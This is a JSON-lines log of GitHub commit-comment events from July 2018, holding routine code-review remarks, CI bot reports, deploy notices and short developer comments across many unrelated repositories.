{"id":"7948426912","type":"CommitCommentEvent","actor":{"login":"romk1n"},"repo":{"name":"artsy/x-react-native"},"payload":{"comment":{"id":29667460,"position":101,"line":543,"path":"workshops/minimum_viable_tooling/README.md","commit_id":"62d0b104b6ab4f5fc16cb687e3bb29ec71c7f94e","created_at":"2018-07-11T08:05:47Z","updated_at":"2018-07-11T08:05:47Z","author_association":"NONE","body":"thank you for the talk the other day @orta would it be possible to update those instructions for the latest version? it seems that neither `babel-preset-2015` install nor `tsc` command work. I tried to use `babel-preset-es2015` but tsc still didn't access `--allowJs` command. Thank you very much!"}},"created_at":"2018-07-11T08:05:47Z"}
{"id":"7948427415","type":"CommitCommentEvent","actor":{"login":"ches"},"repo":{"name":"dadoonet/elasticsearch-beyonder"},"payload":{"comment":{"id":29667462,"position":null,"line":null,"path":null,"commit_id":"1e6b468faf0c3da9b0e9cc13b70a8e4f30a6ba80","created_at":"2018-07-11T08:05:54Z","updated_at":"2018-07-11T08:05:54Z","author_association":"NONE","body":"This is helpful, any plans for a published release @dadoonet?"}},"created_at":"2018-07-11T08:05:54Z"}
{"id":"7948439912","type":"CommitCommentEvent","actor":{"login":"JeRoNZ"},"repo":{"name":"concrete5/concrete5"},"payload":{"comment":{"id":29667486,"position":null,"line":null,"path":null,"commit_id":"23ce0690588992de6406791701251c7a380fa3c4","created_at":"2018-07-11T08:08:42Z","updated_at":"2018-07-11T08:08:42Z","author_association":"NONE","body":"I noticed that this function doesn't actually delete the file unless the subsequent $fv->delete() is passed a true argument. However, it's unsafe to pass this because the file version might not be the result of a changed file - it could be a name/title change for example, in which case deleting the file would be unwise. Seems like there needs to be some way of determining if it's safe to delete.\r\n\r\nIt occurs to me that this can be determined by examining the file version prefix as returned by $fv->getPrefix() and checking whether it's unique among all versions for the specific file id. If it is, then one can assume that it's safe to delete the file and thumbnails. Something like this\r\n```php\r\n\t\t$versions = $files[0]->getFileVersions();\r\n\t\t$prefix = $fv->getPrefix();\r\n\t\t$criteria = Criteria::create();\r\n\t\t$expr = $criteria::expr();\r\n\t\t$criteria->where($expr->eq('fvPrefix', $prefix));\r\n\t\t$matches = $versions->matching($criteria);\r\n\t\t$safeToDelete = $matches->count() > 1 ? false : true;\r\n                $fv->delete($safeToDelete);\r\n```"}},"created_at":"2018-07-11T08:08:42Z"}
{"id":"7948440971","type":"CommitCommentEvent","actor":{"login":"pycrab"},"repo":{"name":"pycrab/booksys"},"payload":{"comment":{"id":29667489,"position":14,"line":71,"path":"WebContent/shopping.html","commit_id":"847b01ef87248f1e9f5711e8834384018dd5f877","created_at":"2018-07-11T08:08:56Z","updated_at":"2018-07-11T08:08:56Z","author_association":"OWNER","body":"删除name属性导致后面查询出错"}},"created_at":"2018-07-11T08:08:56Z"}
{"id":"7948441233","type":"CommitCommentEvent","actor":{"login":"stevegolton"},"repo":{"name":"stevegolton/librouteros"},"payload":{"comment":{"id":29667491,"position":null,"line":null,"path":null,"commit_id":"d7c1de0a8b810853a48b9fc741d4c8492e597590","created_at":"2018-07-11T08:09:00Z","updated_at":"2018-07-11T08:09:00Z","author_association":"OWNER","body":"Sorry for the delay - I had a busy day yesterday!\r\n\r\nThat sounds a lot like the problem I was seeing. Our networking guy rebooted the monitored mikrotik several times a day while he was working on it and the lib would occasionally hang. With this fix in place and the timeout set to 10 seconds the problem seemed to go away.\r\n\r\nUnfortunately I don't have any mikrotik hardware anymore so I am running ROS in a VM. For some reason the VM doesn't show the same issues when rebooting but I managed to reliably reproduce the problem by adding a temporary firewall rule to block the traffic when a request was in progress and then rebooting the VM - the library never returns unless a timeout is configured.\r\n\r\nIf you can reproduce the problem on a real mikrotik, after I've done some more testing with the VM would you mind trying it out on real hardware?"}},"created_at":"2018-07-11T08:09:00Z"}
{"id":"7948443000","type":"CommitCommentEvent","actor":{"login":"pycrab"},"repo":{"name":"pycrab/booksys"},"payload":{"comment":{"id":29667493,"position":18,"line":73,"path":"WebContent/shopping.html","commit_id":"847b01ef87248f1e9f5711e8834384018dd5f877","created_at":"2018-07-11T08:09:22Z","updated_at":"2018-07-11T08:09:22Z","author_association":"OWNER","body":"修改name属性导致后面查询出错"}},"created_at":"2018-07-11T08:09:22Z"}
{"id":"7948445732","type":"CommitCommentEvent","actor":{"login":"RapeFactory"},"repo":{"name":"oknosoft/windowbuilder"},"payload":{"comment":{"id":29667497,"position":38,"line":2981,"path":"dist/windowbuilder.js","commit_id":"225b3f32d74945d0fce90032ec59a488cc529e94","created_at":"2018-07-11T08:09:58Z","updated_at":"2018-07-11T08:09:58Z","author_association":"CONTRIBUTOR","body":"[вот как в заполнениях](https://github.com/oknosoft/windowbuilder/blob/afeb665e1ee4fc85af47ca1f569ec2868fbd9171/src/geometry/filling.js#L289)"}},"created_at":"2018-07-11T08:09:58Z"}
{"id":"7948448070","type":"CommitCommentEvent","actor":{"login":"nearpins"},"repo":{"name":"nearpins/laravel-web"},"payload":{"comment":{"id":29667502,"position":null,"line":null,"path":null,"commit_id":"1deb3d03e7f1751b13e07d065364b7412751a343","created_at":"2018-07-11T08:10:27Z","updated_at":"2018-07-11T08:10:27Z","author_association":"OWNER","body":"Create the branch on your local machine and switch in this branch :\r\n\r\n$ git checkout -b [name_of_your_new_branch]\r\nChange working branch :\r\n\r\n$ git checkout [name_of_your_new_branch]\r\nPush the branch on github :\r\n\r\n$ git push origin [name_of_your_new_branch]\r\nYou can see all branches created by using :\r\n\r\n$ git branch\r\nWhich will show :\r\n\r\n* approval_messages\r\n  master\r\n  master_clean\r\n\r\nAdd a new remote for your branch :\r\n\r\n$ git remote add [name_of_your_remote] \r\nPush changes from your commit into your branch :\r\n\r\n$ git push [name_of_your_new_remote] [name_of_your_branch]\r\nUpdate your branch when the original branch from official repository has been updated :\r\n\r\n$ git fetch [name_of_your_remote]\r\nThen you need to apply to merge changes, if your branch is derivated from develop you need to do :\r\n\r\n"}},"created_at":"2018-07-11T08:10:27Z"}
{"id":"7948449371","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29667504,"position":null,"line":null,"path":null,"commit_id":"e039059907c9b49294c7cacc3ce0e10f52bec845","created_at":"2018-07-11T08:10:45Z","updated_at":"2018-07-11T08:10:45Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 715](https://travis-ci.org/per1234/arduino-ci-script/builds/402546650) will be found at:\nhttps://gist.github.com/arduino-ci-script-bot/9371a7dedb73a560142ff2ca514b79db#file-travis_ci_job_report_00715-001-tsv"}},"created_at":"2018-07-11T08:10:45Z"}
{"id":"7948449483","type":"CommitCommentEvent","actor":{"login":"nearpins"},"repo":{"name":"nearpins/laravel-web"},"payload":{"comment":{"id":29667505,"position":null,"line":null,"path":null,"commit_id":"1deb3d03e7f1751b13e07d065364b7412751a343","created_at":"2018-07-11T08:10:46Z","updated_at":"2018-07-11T08:10:46Z","author_association":"OWNER","body":"git command "}},"created_at":"2018-07-11T08:10:46Z"}
{"id":"7948449665","type":"CommitCommentEvent","actor":{"login":"lm5645"},"repo":{"name":"lm5645/lm5645.github.io"},"payload":{"comment":{"id":29667506,"position":null,"line":null,"path":null,"commit_id":"2cbccd5839f7f046c9d77266a844f116f68ae569","created_at":"2018-07-11T08:10:49Z","updated_at":"2018-07-11T08:10:49Z","author_association":"OWNER","body":"2"}},"created_at":"2018-07-11T08:10:49Z"}
{"id":"7948449798","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29667507,"position":null,"line":null,"path":null,"commit_id":"e039059907c9b49294c7cacc3ce0e10f52bec845","created_at":"2018-07-11T08:10:51Z","updated_at":"2018-07-11T08:10:51Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 715](https://travis-ci.org/per1234/arduino-ci-script/builds/402546650) will be found at:\nhttps://github.com/per1234/CI-reports/tree/arduino-ci-script/build_00715"}},"created_at":"2018-07-11T08:10:51Z"}
{"id":"7948451850","type":"CommitCommentEvent","actor":{"login":"godo13405"},"repo":{"name":"godo13405/dialogflow-v2-client"},"payload":{"comment":{"id":29667512,"position":null,"line":null,"path":null,"commit_id":"ca0a956e63e91ec2b426f21e49cbbef7a66e67f1","created_at":"2018-07-11T08:11:15Z","updated_at":"2018-07-11T08:11:15Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/9db350e1-1bdd-46ce-b6bc-f1a1fe7aae7f?env_id=ibm%3Ayp%3Aeu-gb \"dialogflow-v2-client\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/7c2d4740-e52d-4d28-af66-f8589eede134?env_id=ibm%3Ayp%3Aeu-gb \"dialogflow-v2-client\") deployed [dialogflow-v2-client](https://github.com/godo13405/dialogflow-v2-client/releases/tag/deploy-ibm-yp-eu-gb-UXCalibur-prod-20180711-081114 \"deploy-ibm-yp-eu-gb-UXCalibur-prod-20180711-081114\") to [prod](https://console.bluemix.net/apps/7c20ca82-deb0-46f6-91cb-ccd808781f77?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:UXCalibur:prod\"), including this commit"}},"created_at":"2018-07-11T08:11:15Z"}
{"id":"7948455970","type":"CommitCommentEvent","actor":{"login":"lm5645"},"repo":{"name":"lm5645/lm5645.github.io"},"payload":{"comment":{"id":29667514,"position":null,"line":null,"path":null,"commit_id":"2cbccd5839f7f046c9d77266a844f116f68ae569","created_at":"2018-07-11T08:12:10Z","updated_at":"2018-07-11T08:12:10Z","author_association":"OWNER","body":"![add set](https://user-images.githubusercontent.com/22782696/42558900-2743adda-8525-11e8-9f36-3950ad8719a4.jpg)\r\n"}},"created_at":"2018-07-11T08:12:10Z"}
{"id":"7948460102","type":"CommitCommentEvent","actor":{"login":"lm5645"},"repo":{"name":"lm5645/lm5645.github.io"},"payload":{"comment":{"id":29667522,"position":null,"line":null,"path":null,"commit_id":"2cbccd5839f7f046c9d77266a844f116f68ae569","created_at":"2018-07-11T08:13:01Z","updated_at":"2018-07-11T08:13:01Z","author_association":"OWNER","body":"11"}},"created_at":"2018-07-11T08:13:01Z"}
{"id":"7948461538","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29667526,"position":null,"line":null,"path":null,"commit_id":"ecab6785860d51424dee44a1c78b008b75a9dfd8","created_at":"2018-07-11T08:13:20Z","updated_at":"2018-07-11T08:13:20Z","author_association":"NONE","body":"remove-curve-type (nealkruis) - Win64-Windows-7-VisualStudio-14: OK (2922 of 2930 tests passed, 29 test warnings)\n\nMessages:\n\n * 16 tests had: AUD diffs.\n * 1 test had: BND diffs.\n * 7 tests had: EIO diffs.\n * 5 tests had: ESO big diffs.\n * 3 tests had: Table big diffs.\n * 11 tests had: ERR diffs.\n * 4 tests had: RDD diffs.\n * 2 tests had: ESO small diffs.\n * 2 tests had: MTR small diffs.\n * 1 test had: Table small diffs.\n * 1 test had: MTR big diffs.\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 622\n * Failed: 3\n\nregression Test Summary\n * Passed: 618\n * Failed: 5\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ecab6785860d51424dee44a1c78b008b75a9dfd8-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ecab6785860d51424dee44a1c78b008b75a9dfd8-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.73%25-yellow.png)</a> \n"}},"created_at":"2018-07-11T08:13:20Z"}
{"id":"7948472536","type":"CommitCommentEvent","actor":{"login":"Evgeny-"},"repo":{"name":"resoai/TileBoard"},"payload":{"comment":{"id":29667555,"position":5,"line":530,"path":"TILE_EXAMPLES.md","commit_id":"d32189e2d5140d3c1ccfc5d9efc29f65a5505b29","created_at":"2018-07-11T08:15:37Z","updated_at":"2018-07-11T08:15:37Z","author_association":"COLLABORATOR","body":"You are right, it's a problem of incremental development. I think we should deprecate `iconMap` and move them to parent's `icon`"}},"created_at":"2018-07-11T08:15:37Z"}
{"id":"7948476559","type":"CommitCommentEvent","actor":{"login":"farhi"},"repo":{"name":"McStasMcXtrace/iFit"},"payload":{"comment":{"id":29667566,"position":null,"line":null,"path":null,"commit_id":"cebc243bdfce681f5d9c70d663a2551b0eda0e2b","created_at":"2018-07-11T08:16:25Z","updated_at":"2018-07-11T08:16:25Z","author_association":"CONTRIBUTOR","body":"Was #150, not #110"}},"created_at":"2018-07-11T08:16:25Z"}
{"id":"7948478817","type":"CommitCommentEvent","actor":{"login":"sichvoge"},"repo":{"name":"raml-org/raml-examples"},"payload":{"comment":{"id":29667574,"position":null,"line":null,"path":null,"commit_id":"e91308b6b944a47e1645f23b7a2397ccc58fed3a","created_at":"2018-07-11T08:16:52Z","updated_at":"2018-07-11T08:16:52Z","author_association":"CONTRIBUTOR","body":"can you explain why that change? `schema` is deprecated and shouldn't be used in any 1.0 files anymore."}},"created_at":"2018-07-11T08:16:52Z"}
{"id":"7948479878","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/DownTownScarf7"},"payload":{"comment":{"id":29667575,"position":21,"line":21,"path":"week-08/day-03/login-form/script.js","commit_id":"d435f0d5c43cf6ec1c4c38b4d8035a92bf8cb264","created_at":"2018-07-11T08:17:08Z","updated_at":"2018-07-11T08:17:08Z","author_association":"NONE","body":"👌 "}},"created_at":"2018-07-11T08:17:08Z"}
{"id":"7948482666","type":"CommitCommentEvent","actor":{"login":"PacoPando"},"repo":{"name":"tdwg/PlinianCore"},"payload":{"comment":{"id":29667581,"position":null,"line":null,"path":null,"commit_id":"f6c00432cc76bfc03505d144004cdca022c807cf","created_at":"2018-07-11T08:17:40Z","updated_at":"2018-07-11T08:17:40Z","author_association":"CONTRIBUTOR","body":"Modified to point to GISIN XSDs  in GitHub since www.gisin.org is not longer working"}},"created_at":"2018-07-11T08:17:40Z"}
{"id":"7948485324","type":"CommitCommentEvent","actor":{"login":"WolfgangMichel"},"repo":{"name":"WolfgangMichel/sample-cloud-native-toolchain-tutorial-20180710100925444"},"payload":{"comment":{"id":29667587,"position":null,"line":null,"path":null,"commit_id":"bcae5aa619b7279918f7eecf28df0e096129a38c","created_at":"2018-07-11T08:18:12Z","updated_at":"2018-07-11T08:18:12Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/37014a24-3937-46f8-86a1-63e8accfd3b5?env_id=ibm%3Ayp%3Aeu-gb \"cloud-native-toolchain-tutorial-20180710100925444\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/8835b197-411d-4630-bf0e-75c0cf50fc88?env_id=ibm%3Ayp%3Aeu-gb \"sample-cloud-native-toolchain-tutorial-20180710100925444\") deployed [sample-cloud-native-toolchain-tutorial-20180710100925444](https://github.com/WolfgangMichel/sample-cloud-native-toolchain-tutorial-20180710100925444/releases/tag/deploy-ibm-yp-eu-gb-wolfgang.michel-de.ibm.com-test-20180711-081810 \"deploy-ibm-yp-eu-gb-wolfgang.michel-de.ibm.com-test-20180711-081810\") to [test](https://console.bluemix.net/apps/0b1b3ce0-fa6d-4670-86ec-c5514eac99d4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:wolfgang.michel@de.ibm.com:test\"), including this commit"}},"created_at":"2018-07-11T08:18:12Z"}
{"id":"7948485524","type":"CommitCommentEvent","actor":{"login":"platu"},"repo":{"name":"platu/inetdoc"},"payload":{"comment":{"id":29667588,"position":null,"line":null,"path":null,"commit_id":"fa6541b6ad2cff6926b8d2750e89d00052a4b259","created_at":"2018-07-11T08:18:14Z","updated_at":"2018-07-11T08:18:14Z","author_association":"OWNER","body":"Merci pour le retour !\r\nJe viens de corriger ça à l'instant."}},"created_at":"2018-07-11T08:18:14Z"}
{"id":"7948485639","type":"CommitCommentEvent","actor":{"login":"vector-of-bool"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":29667589,"position":45,"line":73,"path":"src/vs/workbench/api/node/extHostProgress.ts","commit_id":"098cf01a2e35d00206ec29c4e95cfc7d308afdc6","created_at":"2018-07-11T08:18:15Z","updated_at":"2018-07-11T08:18:15Z","author_association":"NONE","body":"Will do in a few hours. It's late for me. Thanks!"}},"created_at":"2018-07-11T08:18:15Z"}
{"id":"7948486760","type":"CommitCommentEvent","actor":{"login":"xiangyu228"},"repo":{"name":"xiangyu228/music"},"payload":{"comment":{"id":29667591,"position":null,"line":null,"path":null,"commit_id":"e4b51248c5952dc83cc0ca04c1ff22a839f70bb2","created_at":"2018-07-11T08:18:29Z","updated_at":"2018-07-11T08:18:29Z","author_association":"OWNER","body":"21123213123123"}},"created_at":"2018-07-11T08:18:29Z"}
{"id":"7948491013","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18002/programming-term2"},"payload":{"comment":{"id":29667598,"position":null,"line":null,"path":null,"commit_id":"5768d13352f56452f58baeec117b093a96ae7f91","created_at":"2018-07-11T08:19:20Z","updated_at":"2018-07-11T08:19:20Z","author_association":"NONE","body":"勝つじゃんけんにしたんですね。結果もOKです。\r\nプラスで文字列を連結しているのも確認しました。\r\n\r\n1点だけ、現状数字以外の文字を入れたときに実行時エラーになります。\r\nもし余裕があれば修正してみてください。"}},"created_at":"2018-07-11T08:19:20Z"}
{"id":"7948494346","type":"CommitCommentEvent","actor":{"login":"lewisnyman"},"repo":{"name":"alphagov/tech-docs-gem"},"payload":{"comment":{"id":29667610,"position":24,"line":19,"path":"lib/govuk_tech_docs/api_reference.rb","commit_id":"425ed9c8b5e7fe9ccc7c83107ba3fb298db0ef1a","created_at":"2018-07-11T08:20:01Z","updated_at":"2018-07-11T08:20:01Z","author_association":"CONTRIBUTOR","body":"@mikebell Have you tried using load_url yet? I'm wondering if that should be the default behaviour for the proof of concept."}},"created_at":"2018-07-11T08:20:01Z"}
{"id":"7948496429","type":"CommitCommentEvent","actor":{"login":"zgwit"},"repo":{"name":"xu-li/cordova-plugin-wechat"},"payload":{"comment":{"id":29667614,"position":null,"line":null,"path":null,"commit_id":"08478ca1ad6544a18cca9c2fda8a961570a4b3f0","created_at":"2018-07-11T08:20:27Z","updated_at":"2018-07-11T08:20:27Z","author_association":"NONE","body":"preferences.getString(WXAPPID_PROPERTY_KEY, \"\");\r\n\r\nCordovaPlugin的preferences不是静态的呀，getAppId()怎么能改成静态的呢"}},"created_at":"2018-07-11T08:20:27Z"}
{"id":"7948501333","type":"CommitCommentEvent","actor":{"login":"WolfgangMichel"},"repo":{"name":"WolfgangMichel/sample-cloud-native-toolchain-tutorial-20180710100925444"},"payload":{"comment":{"id":29667619,"position":null,"line":null,"path":null,"commit_id":"bcae5aa619b7279918f7eecf28df0e096129a38c","created_at":"2018-07-11T08:21:26Z","updated_at":"2018-07-11T08:21:26Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/37014a24-3937-46f8-86a1-63e8accfd3b5?env_id=ibm%3Ayp%3Aeu-gb \"cloud-native-toolchain-tutorial-20180710100925444\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/8835b197-411d-4630-bf0e-75c0cf50fc88?env_id=ibm%3Ayp%3Aeu-gb \"sample-cloud-native-toolchain-tutorial-20180710100925444\") deployed [sample-cloud-native-toolchain-tutorial-20180710100925444](https://github.com/WolfgangMichel/sample-cloud-native-toolchain-tutorial-20180710100925444/releases/tag/deploy-ibm-yp-eu-gb-wolfgang.michel-de.ibm.com-prod-20180711-082125 \"deploy-ibm-yp-eu-gb-wolfgang.michel-de.ibm.com-prod-20180711-082125\") to [prod](https://console.bluemix.net/apps/67214652-32ff-4c14-ae36-48cfda97ba0f?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:wolfgang.michel@de.ibm.com:prod\"), including this commit"}},"created_at":"2018-07-11T08:21:26Z"}
{"id":"7948502094","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29667621,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-11T08:21:36Z","updated_at":"2018-07-11T08:21:36Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T08:21:36Z"}
{"id":"7948509140","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/DownTownScarf7"},"payload":{"comment":{"id":29667633,"position":57,"line":57,"path":"week-08/day-02/bubbling.html","commit_id":"d057de607485db16a26a91811015bd8c66989997","created_at":"2018-07-11T08:22:59Z","updated_at":"2018-07-11T08:22:59Z","author_association":"NONE","body":"It's 🆗, but you can use `event.target.dataset.direction` to get this value"}},"created_at":"2018-07-11T08:22:59Z"}
{"id":"7948510201","type":"CommitCommentEvent","actor":{"login":"shalien"},"repo":{"name":"topjohnwu/MagiskManager"},"payload":{"comment":{"id":29667634,"position":null,"line":null,"path":null,"commit_id":"b885ccbd632eddcabc13781a10d3fec4a4215b39","created_at":"2018-07-11T08:23:13Z","updated_at":"2018-07-11T08:23:13Z","author_association":"NONE","body":"Same here for me, after updating MagiskManager the app hang on the Mask screen "}},"created_at":"2018-07-11T08:23:13Z"}
{"id":"7948541825","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"DronMDF/zold-lazy-node"},"payload":{"comment":{"id":29667691,"position":null,"line":null,"path":null,"commit_id":"48c331ff178a9b44a2ba757572f128781c39ef47","created_at":"2018-07-11T08:29:40Z","updated_at":"2018-07-11T08:29:40Z","author_association":"COLLABORATOR","body":"Puzzle `6-71010d54` disappeared from [`node/app.py`](https://github.com/DronMDF/zold-lazy-node/blob/master/node/app.py), that's why I closed #28. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-11T08:29:40Z"}
{"id":"7948541999","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"DronMDF/zold-lazy-node"},"payload":{"comment":{"id":29667692,"position":null,"line":null,"path":null,"commit_id":"48c331ff178a9b44a2ba757572f128781c39ef47","created_at":"2018-07-11T08:29:42Z","updated_at":"2018-07-11T08:29:42Z","author_association":"COLLABORATOR","body":"Puzzle `41-86a05cf6` disappeared from [`node/score.py`](https://github.com/DronMDF/zold-lazy-node/blob/master/node/score.py), that's why I closed #51. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-11T08:29:42Z"}
{"id":"7948542114","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"DronMDF/zold-lazy-node"},"payload":{"comment":{"id":29667693,"position":null,"line":null,"path":null,"commit_id":"48c331ff178a9b44a2ba757572f128781c39ef47","created_at":"2018-07-11T08:29:43Z","updated_at":"2018-07-11T08:29:43Z","author_association":"COLLABORATOR","body":"Puzzle `51-a737775c` discovered in   [`zold/score.py`](  https://github.com/DronMDF/zold-lazy-node/blob/master/zold/score.py)   and submitted as #59. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-11T08:29:43Z"}
{"id":"7948542227","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"DronMDF/zold-lazy-node"},"payload":{"comment":{"id":29667694,"position":null,"line":null,"path":null,"commit_id":"48c331ff178a9b44a2ba757572f128781c39ef47","created_at":"2018-07-11T08:29:45Z","updated_at":"2018-07-11T08:29:45Z","author_association":"COLLABORATOR","body":"Puzzle `51-784537fb` discovered in   [`test/node/score.py`](  https://github.com/DronMDF/zold-lazy-node/blob/master/test/node/score.py)   and submitted as #60. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-11T08:29:45Z"}
{"id":"7948542350","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"DronMDF/zold-lazy-node"},"payload":{"comment":{"id":29667695,"position":null,"line":null,"path":null,"commit_id":"48c331ff178a9b44a2ba757572f128781c39ef47","created_at":"2018-07-11T08:29:46Z","updated_at":"2018-07-11T08:29:46Z","author_association":"COLLABORATOR","body":"Puzzle `51-a5ec3281` discovered in   [`node/score.py`](  https://github.com/DronMDF/zold-lazy-node/blob/master/node/score.py)   and submitted as #61. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-11T08:29:46Z"}
{"id":"7948542493","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"DronMDF/zold-lazy-node"},"payload":{"comment":{"id":29667696,"position":null,"line":null,"path":null,"commit_id":"48c331ff178a9b44a2ba757572f128781c39ef47","created_at":"2018-07-11T08:29:48Z","updated_at":"2018-07-11T08:29:48Z","author_association":"COLLABORATOR","body":"Puzzle `51-d4183988` discovered in   [`node/score.py`](  https://github.com/DronMDF/zold-lazy-node/blob/master/node/score.py)   and submitted as #62. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-11T08:29:48Z"}
{"id":"7948542676","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"DronMDF/zold-lazy-node"},"payload":{"comment":{"id":29667698,"position":null,"line":null,"path":null,"commit_id":"48c331ff178a9b44a2ba757572f128781c39ef47","created_at":"2018-07-11T08:29:49Z","updated_at":"2018-07-11T08:29:49Z","author_association":"COLLABORATOR","body":"Puzzle `51-da159903` discovered in   [`node/score.py`](  https://github.com/DronMDF/zold-lazy-node/blob/master/node/score.py)   and submitted as #63. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-11T08:29:49Z"}
{"id":"7948542870","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"DronMDF/zold-lazy-node"},"payload":{"comment":{"id":29667699,"position":null,"line":null,"path":null,"commit_id":"48c331ff178a9b44a2ba757572f128781c39ef47","created_at":"2018-07-11T08:29:51Z","updated_at":"2018-07-11T08:29:51Z","author_association":"COLLABORATOR","body":"Puzzle `54-015f6299` discovered in   [`zold/score.py`](  https://github.com/DronMDF/zold-lazy-node/blob/master/zold/score.py)   and submitted as #64. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-11T08:29:51Z"}
{"id":"7948544352","type":"CommitCommentEvent","actor":{"login":"terrancestw"},"repo":{"name":"terrancestw/projecta"},"payload":{"comment":{"id":29667703,"position":null,"line":null,"path":null,"commit_id":"d9d13618cdadc1a7d21dacc6459ab0423817e774","created_at":"2018-07-11T08:30:06Z","updated_at":"2018-07-11T08:30:06Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-11T08:30:06Z"}
{"id":"7948552828","type":"CommitCommentEvent","actor":{"login":"HerrNorbert"},"repo":{"name":"green-fox-academy/maraevelin"},"payload":{"comment":{"id":29667725,"position":4,"line":28,"path":"week-08/day-05/reddit/src/main/java/com/greenfoxacademy/reddit/models/Post.java","commit_id":"e96fba7078bc69fa50e3a67d3b63b4e1741abc49","created_at":"2018-07-11T08:31:38Z","updated_at":"2018-07-11T08:31:38Z","author_association":"NONE","body":"Unfortunately this method name is misleading :( If I see a `get` method I'm expecting that I will get a field from that object. How about `increaseScore()`?"}},"created_at":"2018-07-11T08:31:38Z"}
{"id":"7948553369","type":"CommitCommentEvent","actor":{"login":"sfraza"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29667726,"position":158,"line":124,"path":"src/runtime/hexagon_dma_pool.cpp","commit_id":"99b292374683f1f6d22a26663a131e69c94647b6","created_at":"2018-07-11T08:31:46Z","updated_at":"2018-07-11T08:31:46Z","author_association":"COLLABORATOR","body":"We already have a failure condition handling in hexagon_dma.cpp. No need to handle this here. "}},"created_at":"2018-07-11T08:31:46Z"}
{"id":"7948563212","type":"CommitCommentEvent","actor":{"login":"sfraza"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29667742,"position":199,"line":149,"path":"src/runtime/hexagon_dma_pool.cpp","commit_id":"99b292374683f1f6d22a26663a131e69c94647b6","created_at":"2018-07-11T08:33:42Z","updated_at":"2018-07-11T08:33:42Z","author_association":"COLLABORATOR","body":"Merged two API into one. Once all virtual engines are not in use, deallocate dma resources. "}},"created_at":"2018-07-11T08:33:42Z"}
{"id":"7948564012","type":"CommitCommentEvent","actor":{"login":"sfraza"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29667743,"position":13,"line":13,"path":"src/runtime/hexagon_dma_pool.h","commit_id":"99b292374683f1f6d22a26663a131e69c94647b6","created_at":"2018-07-11T08:33:51Z","updated_at":"2018-07-11T08:33:51Z","author_association":"COLLABORATOR","body":"Done"}},"created_at":"2018-07-11T08:33:51Z"}
